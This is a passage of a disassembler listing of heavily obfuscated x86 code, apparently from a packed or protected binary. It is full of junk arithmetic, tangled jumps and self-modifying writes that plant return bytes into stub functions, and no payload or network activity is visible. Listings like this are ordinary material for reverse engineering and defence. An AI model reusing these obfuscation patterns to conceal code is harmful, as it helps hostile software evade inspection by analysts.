; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EAA2

loc_44121D:				; CODE XREF: sub_44EAA2+1Bj
		jmp	loc_43C1A9
; END OF FUNCTION CHUNK	FOR sub_44EAA2

; =============== S U B	R O U T	I N E =======================================



sub_441222	proc near		; DATA XREF: sub_444EDE+7700o

; FUNCTION CHUNK AT 00444C56 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456563 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004593BC SIZE 00000005 BYTES

		add	eax, 2
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-0Ch]
		add	[ebp-8], eax
		jmp	loc_4593BC
sub_441222	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C104

loc_441233:				; CODE XREF: sub_45C104-13999j
		xor	esi, eax

loc_441235:				; CODE XREF: sub_45C104-139B1j
		add	ebx, 5CB40577h
		xor	ebx, 7A0C76Bh
		add	ebx, ebp
		add	ebx, 12AC56F7h
		mov	[ebx], eax
		xchg	ebp, [esp+0]
		mov	ebx, ebp
		jmp	loc_457DE4
; END OF FUNCTION CHUNK	FOR sub_45C104
; ---------------------------------------------------------------------------
		push	3B51BA85h
		pop	eax
		or	eax, ds:4000F3h
		add	eax, 0AD69AA3Dh
		or	eax, 97F7C716h
		xor	eax, 0CE616BC0h
		add	eax, 8AD50CC2h
		push	ecx
		jmp	loc_43CE8F
; ---------------------------------------------------------------------------

locret_44127F:				; CODE XREF: y2kk37jd:0044504Aj
		retn
; ---------------------------------------------------------------------------

loc_441280:				; DATA XREF: sub_452B42-DFC2o
		xchg	ecx, [esp]
		jmp	loc_43D80D

; =============== S U B	R O U T	I N E =======================================



sub_441288	proc near		; CODE XREF: y2kk37jd:0043DAE7j
					; sub_443AA7-56EEp
		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_440CD1
		push	eax
		ror	eax, 0Ch
		mov	ds:dword_4516D8, eax

locret_44129B:				; CODE XREF: sub_45B7AA:loc_4503FEj
		retn
sub_441288	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB56

loc_44129C:				; CODE XREF: sub_44EB56+2FB7j
		add	eax, 0E6F77636h
		mov	eax, [eax]
		push	eax
		call	sub_456541
		call	nullsub_474
		jmp	loc_459889
; END OF FUNCTION CHUNK	FOR sub_44EB56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_4412B4:				; CODE XREF: sub_43E1E9:loc_444B09j
		jz	loc_444615
		jmp	loc_44D51A
; END OF FUNCTION CHUNK	FOR sub_43E1E9

; =============== S U B	R O U T	I N E =======================================



sub_4412BF	proc near		; CODE XREF: y2kk37jd:0044CC88j
					; y2kk37jd:loc_455AC4p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440625 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045BD2C SIZE 00000015 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_44884D
		mov	edx, 87C4571Ah
		push	eax
		push	775A7864h
		xchg	ebx, [esp+4+var_4]
		mov	eax, ebx
		jmp	loc_45BD2C
sub_4412BF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4412DD:				; DATA XREF: sub_43CF31+361Co
		push	edx
		call	sub_447041
		mov	eax, 8CA83E2Ch
		call	sub_44113A
		mov	ds:off_41E03C, eax
		lea	eax, sub_43CF31
		jmp	loc_440DF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44472C

loc_4412FE:				; CODE XREF: sub_44472C:loc_4566B5j
		mov	edx, [edx+1Ch]
		add	edx, [ebp-4]
		add	eax, edx
		push	offset sub_451C69
		jmp	loc_456DD3
; END OF FUNCTION CHUNK	FOR sub_44472C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454371

loc_441310:				; CODE XREF: sub_454371+16j
		add	edx, 0FDF45175h
		xchg	edx, [esp+0]
		jmp	sub_454D0F
; END OF FUNCTION CHUNK	FOR sub_454371

; =============== S U B	R O U T	I N E =======================================



sub_44131E	proc near		; DATA XREF: y2kk37jd:00450E2Eo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00442A30 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004483CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FB7D SIZE 00000005 BYTES

		mov	edx, eax
		pop	eax
		js	loc_4483CE
		mov	eax, [esp-4+arg_0]
sub_44131E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44132A	proc near		; CODE XREF: sub_43CBDE:loc_43CBACj

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044C133 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450E50 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045C5EB SIZE 00000005 BYTES

		push	ebx
		jmp	loc_450E50
sub_44132A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A36

loc_441330:				; CODE XREF: sub_458A36:loc_444F9Fj
		or	eax, eax
		jnz	loc_43EB9E
		jmp	loc_442728
; END OF FUNCTION CHUNK	FOR sub_458A36
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_451. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	dword ptr ds:5A00016Ch,	5224048Bh
		call	sub_449775
		mov	eax, 0B2EE4EE4h
		push	ebx
		mov	ebx, edx
		jmp	loc_456241
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44572F

loc_44135A:				; CODE XREF: sub_44572F+EF7Cj
		push	97F4B69Fh
		xchg	ebx, [esp+38h+var_38]
		mov	esi, ebx
		pop	ebx
		or	esi, 0FC5DE43Ah
		and	esi, 4E00DED9h
		add	esi, 0B243AAECh
		jmp	loc_43D361
; END OF FUNCTION CHUNK	FOR sub_44572F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44137C:				; CODE XREF: sub_44C4BC+1384j
		sbb	ebp, 7EEBD1E1h
		and	ebx, 9A9EE1DCh

loc_441388:				; CODE XREF: sub_44C4BC:loc_44D834j
		and	eax, 0CFD97600h
		add	eax, 0CA26C939h
		add	eax, ebp
		add	eax, 757FC0C3h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_457855
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_4413A7:				; DATA XREF: sub_44023C+A557o
		push	edi
		mov	edi, ebp
		xchg	edi, [esp]
		mov	ebp, esp
		call	sub_43B5AF
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_4413B4:				; CODE XREF: sub_44E840+8F54j
		jmp	sub_4415B8
; END OF FUNCTION CHUNK	FOR sub_44E840
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4413B9:				; CODE XREF: sub_45B7AA:loc_453A99j
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_4413BE:				; CODE XREF: y2kk37jd:loc_444356j
		mov	edx, ecx
		sbb	eax, edx
		mov	esi, 0E537058Eh
		push	0BDFB8444h
		jmp	loc_443726
; ---------------------------------------------------------------------------

loc_4413D1:				; DATA XREF: y2kk37jd:00441476o
		ror	eax, 0Ah
		push	edi
		push	0F4B84B52h
		pop	edi
		rol	edi, 1Ah
		jmp	loc_4496B6

; =============== S U B	R O U T	I N E =======================================



sub_4413E3	proc near		; CODE XREF: y2kk37jd:00455E49j
					; sub_445226+11278p

; FUNCTION CHUNK AT 0044E097 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450BBD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BC33 SIZE 0000000C BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ebx, edx
		pop	edx
		pop	ebx
		pop	eax
		pop	ecx
		jmp	loc_45BC33
sub_4413E3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451682

loc_4413F2:				; CODE XREF: sub_451682+9F4Aj
		push	offset loc_45A24F
		jmp	loc_445129
; END OF FUNCTION CHUNK	FOR sub_451682
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A865

loc_4413FC:				; CODE XREF: sub_45A865:loc_43DE5Bj
		mov	eax, ebx
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_45A865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_441400:				; CODE XREF: sub_44DED9+DD8Dj
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_441404:				; CODE XREF: sub_4458DD+C27Ej
		jmp	nullsub_117
; END OF FUNCTION CHUNK	FOR sub_4458DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44140A:				; CODE XREF: y2kk37jd:0044D542j
		sub	edi, 0F65358EBh
		mov	[eax], ebx
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_441412:				; CODE XREF: sub_44001E+D517j
		add	eax, 5B04D505h
		xor	eax, 0D41E7956h
		jmp	loc_4560DD
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_441423:				; CODE XREF: sub_454C24:loc_45434Bj
					; DATA XREF: y2kk37jd:0044217Eo
		lea	eax, nullsub_17
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_17
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		jmp	loc_4462EF
; ---------------------------------------------------------------------------

loc_44143A:				; CODE XREF: y2kk37jd:004573B6j
		jz	loc_45BACA
		jmp	loc_43BB39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E1E9

loc_441445:				; CODE XREF: sub_43E1E9+12514j
		pop	edi
		mov	[ebp+0], eax

loc_441449:				; CODE XREF: sub_44B8FF:loc_4520BDj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44461A
		jmp	loc_444B09
; END OF FUNCTION CHUNK	FOR sub_43E1E9
; ---------------------------------------------------------------------------

loc_44145A:				; CODE XREF: y2kk37jd:00443A52j
		or	edx, eax

; =============== S U B	R O U T	I N E =======================================



sub_44145C	proc near		; CODE XREF: y2kk37jd:0043C8CCp
		xchg	ebx, [esp+0]
		pop	ebx
		push	edi
		push	40502434h
		pop	edi
		rol	edi, 9
		add	edi, 6D96063Dh
		jmp	loc_445327
sub_44145C	endp

; ---------------------------------------------------------------------------
		push	eax
		push	offset loc_4413D1
		jmp	locret_443CD9
; ---------------------------------------------------------------------------

loc_441480:				; DATA XREF: sub_44D302+516Fo
		mov	eax, [ebp-1Ch]
		push	offset loc_43E8C7
		jmp	locret_453D39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44516F

loc_44148D:				; CODE XREF: sub_44516F-3B2Ej
		mov	byte ptr [eax],	0C3h
		jmp	loc_43FAEB
; END OF FUNCTION CHUNK	FOR sub_44516F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AFD

loc_441495:				; CODE XREF: sub_443AFD:loc_450C83j
		mov	eax, [esp+0]
		push	edx
		call	sub_4553C1
		mov	eax, 462C961Fh
		jmp	loc_453DD3
; END OF FUNCTION CHUNK	FOR sub_443AFD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44853F

loc_4414A9:				; CODE XREF: sub_44853F+D383j
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_44853F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A011

loc_4414AE:				; CODE XREF: sub_44A011+15j
		jmp	loc_45A3FE
; END OF FUNCTION CHUNK	FOR sub_44A011
; ---------------------------------------------------------------------------

loc_4414B3:				; CODE XREF: y2kk37jd:loc_43CF2Cj
		push	edx
		call	sub_449775
		push	0AC30053Dh
		pop	eax
		and	eax, 0AF2D648Ah
		add	eax, 74213707h
		call	sub_442C3E
		push	ecx
		jmp	loc_44868E
; ---------------------------------------------------------------------------

loc_4414D6:				; CODE XREF: y2kk37jd:loc_43DEC7j
		call	sub_445DF5
		jmp	loc_457F76
; ---------------------------------------------------------------------------
		mov	eax, [ebp-4]
		push	eax
		jmp	loc_453EB9
; ---------------------------------------------------------------------------

loc_4414E9:				; CODE XREF: y2kk37jd:004519AAj
		pushf
		jmp	loc_4422C8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5BD

loc_4414EF:				; CODE XREF: sub_43F5BD+19BD4j
		call	sub_4411C3

loc_4414F4:				; CODE XREF: sub_44E95F+7j
		jmp	loc_44900D
; END OF FUNCTION CHUNK	FOR sub_43F5BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_4414F9:				; CODE XREF: sub_43F911:loc_43B296j
		xor	ecx, 0E0F38BE9h
		add	ecx, 0D40C619Bh
		xchg	ecx, [esp+0]
		jmp	loc_44F4B3
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_44150D:				; CODE XREF: sub_449C4F+3B43j
		jz	loc_440A99
		jmp	loc_45767C
; END OF FUNCTION CHUNK	FOR sub_449C4F

; =============== S U B	R O U T	I N E =======================================



sub_441518	proc near		; CODE XREF: y2kk37jd:0043DF45j
					; sub_43D58E:loc_455AC9p
		xchg	edx, [esp+0]
		pop	edx
		push	eax

loc_44151D:				; CODE XREF: sub_445226:loc_44F873j
		call	sub_4526B7
		retn
sub_441518	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_441523:				; CODE XREF: sub_457A46-4CF2j
		jmp	loc_43DCEF
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445C40

loc_441528:				; CODE XREF: sub_445C40-2323j
		jmp	loc_452F03
; END OF FUNCTION CHUNK	FOR sub_445C40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_44152D:				; CODE XREF: sub_448CAE:loc_4480B3j
		jnz	loc_43D38B

loc_441533:				; CODE XREF: sub_454539+2CB3j
		jmp	nullsub_138
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
		and	edx, 0C4AC28A0h
		not	eax
		or	eax, 50AFA9BCh
		shr	ebp, 6
		jmp	loc_43D38B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444463

loc_44154E:				; CODE XREF: sub_444463+16B53j
		jno	loc_449252
		and	esi, ecx
		adc	ecx, 7BAD5355h

loc_44155C:				; CODE XREF: sub_444463:loc_45AFAAj
		add	eax, 6215A3E8h
		add	eax, ebp
		jmp	loc_451575
; END OF FUNCTION CHUNK	FOR sub_444463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_441569:				; CODE XREF: sub_43ED86-1FBj
		sub	edx, 0BA31CCD9h
		xor	edx, 8442053Fh
		push	offset sub_443C92
		jmp	loc_44A058
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44157F:				; CODE XREF: sub_4458DD:loc_4495D4j
		xchg	esi, [ebx]
		jmp	loc_43D71E
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_441586:				; CODE XREF: sub_445226+F467j
		popf
		jmp	loc_44E7F8
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_44158C:				; CODE XREF: sub_44AD49:loc_454200j
		cmp	ebp, 0EF1E3074h
		jmp	loc_451E40
; END OF FUNCTION CHUNK	FOR sub_44AD49
; ---------------------------------------------------------------------------

loc_441597:				; CODE XREF: y2kk37jd:00442BAEj
		jno	loc_45370A

; =============== S U B	R O U T	I N E =======================================



sub_44159D	proc near		; CODE XREF: sub_449C4F:loc_43E356p
		xchg	esi, [esp+0]
		pop	esi
		pop	ecx
		pop	ebp
		retn
sub_44159D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F984

loc_4415A4:				; CODE XREF: sub_44F984+Cj
		jmp	nullsub_374
; END OF FUNCTION CHUNK	FOR sub_44F984
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443688

loc_4415A9:				; CODE XREF: sub_443688+8j
		jmp	loc_453CED
; END OF FUNCTION CHUNK	FOR sub_443688
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_4415AE:				; CODE XREF: sub_44E5E5-10105j
		jmp	loc_442E11
; END OF FUNCTION CHUNK	FOR sub_44E5E5
; ---------------------------------------------------------------------------

loc_4415B3:				; CODE XREF: y2kk37jd:0043B4E9j
		jmp	loc_44F2A6

; =============== S U B	R O U T	I N E =======================================



sub_4415B8	proc near		; CODE XREF: sub_44E840:loc_4413B4j
					; sub_444338+8p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EFEF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443C71 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044A2B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB6F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454BF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456ADE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045764D SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00459901 SIZE 0000002D BYTES

		push	ecx
		mov	ecx, edi
		jmp	loc_43EFEF
sub_4415B8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C9E7

loc_4415C0:				; CODE XREF: sub_43C9E7:loc_45A9FAj
		add	eax, 0C56D14EEh
		xor	eax, 0A7BFA38Fh
		add	eax, ebp
		push	offset sub_44229C
		jmp	nullsub_341
; END OF FUNCTION CHUNK	FOR sub_43C9E7

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4415D8	proc near		; CODE XREF: sub_4436E7+75D5j
		retn
sub_4415D8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_4415D9:				; CODE XREF: sub_458FC0-7ACj
		jmp	loc_456F4F
; END OF FUNCTION CHUNK	FOR sub_458FC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_4415DE:				; CODE XREF: sub_454413-AFEj
		jmp	loc_445986
; END OF FUNCTION CHUNK	FOR sub_454413

; =============== S U B	R O U T	I N E =======================================



sub_4415E3	proc near		; DATA XREF: y2kk37jd:00455832o
		mov	byte ptr [eax],	0C3h
		jmp	sub_4543EF
sub_4415E3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4543EF

loc_4415EB:				; CODE XREF: sub_4543EFj
		xchg	eax, [esp+0]
		mov	edx, eax
		pop	eax
		mov	eax, [esp+4+var_4]
		jmp	loc_453437
; END OF FUNCTION CHUNK	FOR sub_4543EF
; ---------------------------------------------------------------------------

loc_4415F9:				; CODE XREF: y2kk37jd:0045570Cj
		jbe	loc_448CB2

; =============== S U B	R O U T	I N E =======================================



sub_4415FF	proc near		; CODE XREF: sub_447977+11p
					; sub_4458DD+F03Dj

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ecx, [esp-4+arg_0]

loc_441606:				; CODE XREF: y2kk37jd:loc_44CD42j
		jmp	sub_454413
sub_4415FF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edi
		jmp	sub_441FCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444000

loc_441611:				; CODE XREF: sub_444000+D90Cj
		shl	ebx, 4
		pop	ebp
		push	4FD41A3h
		jmp	loc_45C4D2
; END OF FUNCTION CHUNK	FOR sub_444000
; ---------------------------------------------------------------------------

loc_44161F:				; CODE XREF: y2kk37jd:0043D36Cj
		and	ebp, edi
		shl	eax, 0Eh
		pushf

loc_441625:				; CODE XREF: y2kk37jd:0043D35Bj
		xor	eax, 0DCE8859Fh
		call	sub_442C3E
		jmp	loc_442A7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44516F

loc_441635:				; CODE XREF: sub_44516F:loc_4457F1j
		xchg	eax, [esp+0]

loc_441638:				; CODE XREF: y2kk37jd:0043FB28j
		mov	ebx, eax
		pop	eax
		lea	eax, sub_443AFD
		jmp	loc_44148D
; END OF FUNCTION CHUNK	FOR sub_44516F
; ---------------------------------------------------------------------------

loc_441646:				; CODE XREF: y2kk37jd:loc_45404Ej
		push	19110ABh
		pop	ecx
		sub	ecx, 4C93FDC7h
		xor	ecx, 0E80E4558h
		add	ecx, 0A350B51Fh
		xchg	ecx, [esp]
		jmp	sub_459F8F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_440. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_441667:				; CODE XREF: sub_457A46-EFD6j
		jz	loc_4548C7
		jmp	loc_43F201
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_441672:				; CODE XREF: y2kk37jd:0044D6FAj
					; sub_4411C3+14E84j
		call	sub_444C79
; END OF FUNCTION CHUNK	FOR sub_4411C3
; START	OF FUNCTION CHUNK FOR sub_445DF5

loc_441677:				; CODE XREF: sub_445DF5+9j
		call	nullsub_11
		mov	eax, ds:dword_44FC84
		call	sub_4526B7
		mov	esp, ebp
		jmp	loc_44BCDF
; END OF FUNCTION CHUNK	FOR sub_445DF5
; ---------------------------------------------------------------------------

loc_44168D:				; CODE XREF: y2kk37jd:loc_4591E1j
		jz	loc_457C81
		jmp	loc_4461CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B4E1

loc_441698:				; CODE XREF: sub_44B4E1:loc_44EBB3j
					; sub_44B4E1+36E3j
		sub	esi, 68D66CA8h
		or	esi, ds:4000EEh
		add	esi, 92E279BEh
		call	loc_445422

locret_4416AF:				; CODE XREF: y2kk37jd:loc_451D2Ej
		retn
; END OF FUNCTION CHUNK	FOR sub_44B4E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_4416B0:				; CODE XREF: sub_44001E-4A1Aj
		jmp	loc_459A04
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D2FC

loc_4416B5:				; CODE XREF: sub_43D2FC+15j
		jnz	loc_447080
		not	ecx
		mov	ebp, ecx
		jnp	loc_45B139
		xor	edi, eax
		jmp	loc_447080
; END OF FUNCTION CHUNK	FOR sub_43D2FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C894

loc_4416CC:				; CODE XREF: sub_44C894:loc_4426A4j
		mov	[edx], eax
		pop	edx
		lea	eax, loc_43FE71
; END OF FUNCTION CHUNK	FOR sub_44C894
; START	OF FUNCTION CHUNK FOR sub_456809

loc_4416D5:				; CODE XREF: sub_456809:loc_45A988j
		mov	byte ptr [eax],	0C3h
		jmp	loc_43FE71
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4416DD:				; CODE XREF: sub_445226:loc_43CF56j
		not	eax
		adc	ebp, 97219BA9h
		xchg	ebp, [edx]
		popf
		push	edx
		jmp	loc_4583E6
; ---------------------------------------------------------------------------

loc_4416EE:				; CODE XREF: sub_445226+4AD8j
		jl	loc_456346
		jle	loc_44239D
		jle	sub_4580C5
		jmp	loc_454F92
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_441705:				; CODE XREF: sub_43E679+12F73j
		jl	loc_44EF2C

loc_44170B:				; CODE XREF: sub_451C7D-11856j
					; sub_43E679:loc_447181j ...
		jmp	loc_4443C2
; ---------------------------------------------------------------------------

loc_441710:				; CODE XREF: sub_43E679+16992j
					; sub_45689F+12B9j
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43E679

; =============== S U B	R O U T	I N E =======================================



sub_441718	proc near		; CODE XREF: y2kk37jd:0043C275p
					; y2kk37jd:0044F588j ...

; FUNCTION CHUNK AT 004542F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E04 SIZE 0000000C BYTES

		push	ebp
		jmp	loc_454E04
sub_441718	endp

; ---------------------------------------------------------------------------
		ror	ebp, 1Dh
		jmp	loc_4504D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_441726:				; CODE XREF: sub_4577FE-828Bj
		and	ecx, 0F6674D66h
		add	ecx, 1C6B5997h
		jnz	loc_44230B

loc_441738:				; CODE XREF: sub_453B0B-163Bj
		jmp	loc_45C37D
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44173D:				; CODE XREF: sub_43ED19-236Bj
		jmp	loc_4554FF
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
		popf
		jmp	loc_442304
; ---------------------------------------------------------------------------
		jnb	loc_45605D
		adc	ebx, 9BE3009Eh
		jmp	sub_44291B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_441759:				; CODE XREF: sub_453583-88BCj
		jnz	loc_44B8C0

loc_44175F:				; CODE XREF: sub_451964+4C37j
		jmp	loc_455406
; ---------------------------------------------------------------------------

loc_441764:				; CODE XREF: sub_453583+Cj
		jmp	loc_444F74
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_441769:				; CODE XREF: sub_453867-1FDBj
		jmp	loc_44E13A
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_44176E:				; CODE XREF: y2kk37jd:0043DA79j
		jmp	sub_45405E
; ---------------------------------------------------------------------------
		or	ebp, ecx
		push	eax
		jmp	loc_44F7F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_252. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4532F4

loc_44177C:				; CODE XREF: sub_4532F4-637j
		jmp	loc_4406D6
; END OF FUNCTION CHUNK	FOR sub_4532F4
; ---------------------------------------------------------------------------

locret_441781:				; CODE XREF: y2kk37jd:00457B0Aj
		retn
; ---------------------------------------------------------------------------

loc_441782:				; CODE XREF: y2kk37jd:loc_44C9F6j
		jo	loc_445F41

loc_441788:				; CODE XREF: y2kk37jd:loc_44C9E4j
		add	ebx, 0FF649D11h
		call	sub_442049
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_441793:				; CODE XREF: sub_44610D:loc_454156j
		mov	eax, 0D59435E2h
		call	sub_442C3E
		push	edi
		push	0FAF4DD97h
		pop	edi
		or	edi, 5D35FDF4h
		jmp	loc_457799
; END OF FUNCTION CHUNK	FOR sub_44610D

; =============== S U B	R O U T	I N E =======================================



sub_4417AF	proc near		; DATA XREF: sub_448700:loc_44A090o
		mov	eax, [eax]
		add	eax, [ebp-4]
		call	sub_441856
		push	offset loc_43E87B
		jmp	nullsub_346
sub_4417AF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_4417C3:				; CODE XREF: sub_44D6A5-9EF2j
		jz	loc_457122
		jmp	loc_4595B5
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
		push	edi
		push	786CDC42h
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_4417D4:				; CODE XREF: sub_45689F:loc_442E56j
		pop	edi
		or	edi, 736CD543h
		and	edi, 0A756E5F8h
		jmp	loc_44566B
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_4417E6	proc near		; CODE XREF: sub_4444CA:loc_443825j
		push	ebx

loc_4417E7:				; CODE XREF: sub_43F770+AD0Aj
		push	offset loc_444756
		jmp	nullsub_39
sub_4417E6	endp

; ---------------------------------------------------------------------------
		shl	ecx, 1Dh
		not	edx
		jmp	sub_444773
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BE53

loc_4417FB:				; CODE XREF: sub_43BE53+10j
		xor	edi, 7963E13Eh
		add	edi, ebp
		add	edi, 957809BEh
		mov	[edi], eax
		pop	edi
		push	esi
		pushf

